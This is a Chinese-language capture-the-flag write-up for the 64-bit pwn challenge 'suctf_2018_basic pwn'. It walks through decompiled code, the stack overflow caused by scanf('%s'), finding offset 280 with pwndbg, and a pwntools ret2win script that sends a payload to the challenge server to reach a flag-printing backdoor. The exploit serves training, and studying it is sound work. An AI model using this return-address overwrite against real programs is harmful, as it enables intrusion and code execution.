suctf_2018_basic pwn

准备


64 位,开了 NX 保护

分析

main函数

1
2
3
4
5
6
7
8
9
10
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[268]; // [rsp+10h] [rbp-110h] BYREF
  int v5; // [rsp+11Ch] [rbp-4h]

  scanf("%s", s);
  v5 = strlen(s);
  printf("Hi %s\n", s);
  return 0;
}

使用 scanf("%s", s) 读取用户输入到 s
%s 格式的 scanf 不会检查输入长度,当输入的字符串超过 268 字节时,会导致缓冲区溢出

callThisFun函数(后门函数)

1
2
3
4
5
6
7
8
9
int callThisFun(void)
{
  char *path[4]; // [rsp+0h] [rbp-20h] BYREF

  path[0] = "/bin/cat";
  path[1] = "flag.txt";
  path[2] = 0LL;
  return execve("/bin/cat", path, 0LL);
}

这里直接读取 flag.txt 文件的内容

思路

这题有栈溢出,并且 callThisFun 函数他会直接输出 flag ,所以就是简单 64 位栈溢出题
先通过gdb获得偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
motaly@motaly-VMware-Virtual-Platform:~$ gdb bp
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from bp...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in bp)
------- tip of the day (disable with set show-tips off) -------
Calling functions like call (void)puts("hello world") will run all other target threads for the time the function runs. Use set scheduler-locking on to lock the execution to current thread when calling functions
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/bp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
Hi aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaa�

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011fe in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffd818 —▸ 0x7fffffffdbf3 ◂— '/home/motaly/bp'
 RCX  0
 RDX  0
 RDI  0x7fffffffd3f0 —▸ 0x7fffffffd420 ◂— 0x6161616168626161 ('aabhaaaa')
 RSI  0x4056b0 ◂— 0x6161616161206948 ('Hi aaaaa')
 R8   0x7ffff7e03b20 (main_arena+96) —▸ 0x405ab0 ◂— 0
 R9   0x410
 R10  1
 R11  0x202
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x626161616161616a ('jaaaaaab')
 RSP  0x7fffffffd6f8 ◂— 0x626161616161616b ('kaaaaaab')
 RIP  0x4011fe (main+102) ◂— ret 
───────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────
 ► 0x4011fe <main+102>    ret                                <0x626161616161616b>










────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd6f8 ◂— 0x626161616161616b ('kaaaaaab')
01:0008│     0x7fffffffd700 ◂— 0x626161616161616c ('laaaaaab')
02:0010│     0x7fffffffd708 ◂— 0x626161616161616d ('maaaaaab')
03:0018│     0x7fffffffd710 ◂— 'naaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
04:0020│     0x7fffffffd718 ◂— 'oaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
05:0028│     0x7fffffffd720 ◂— 'paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
06:0030│     0x7fffffffd728 ◂— 'qaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
07:0038│     0x7fffffffd730 ◂— 'raaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
──────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────
 ► 0         0x4011fe main+102
   1 0x626161616161616b None
   2 0x626161616161616c None
   3 0x626161616161616d None
   4 0x626161616161616e None
   5 0x626161616161616f None
   6 0x6261616161616170 None
   7 0x6261616161616171 None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x626161616161616b
Finding cyclic pattern of 8 bytes: b'kaaaaaab' (hex: 0x6b61616161616162)
Found at offset 280

偏移量为 280
然后通过 ida 查看 callThisFun 后门函数的地址

得到 callThisFun 后门函数的地址为 0x401157
根据这两个信息直接构造 payload ,先填充,再返回地址

1
2
3
4
flag=0x401157

payload=b'b'*280+p64(flag)
io.sendline(payload)

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context(os='linux',log_level='debug',arch='amd64')
io=remote('node5.buuoj.cn',27967)
# io= process('/home/motaly/bp')
elf=ELF('/home/motaly/bp')

flag=0x401157

payload=b'b'*280+p64(flag)
io.sendline(payload)

io.interactive()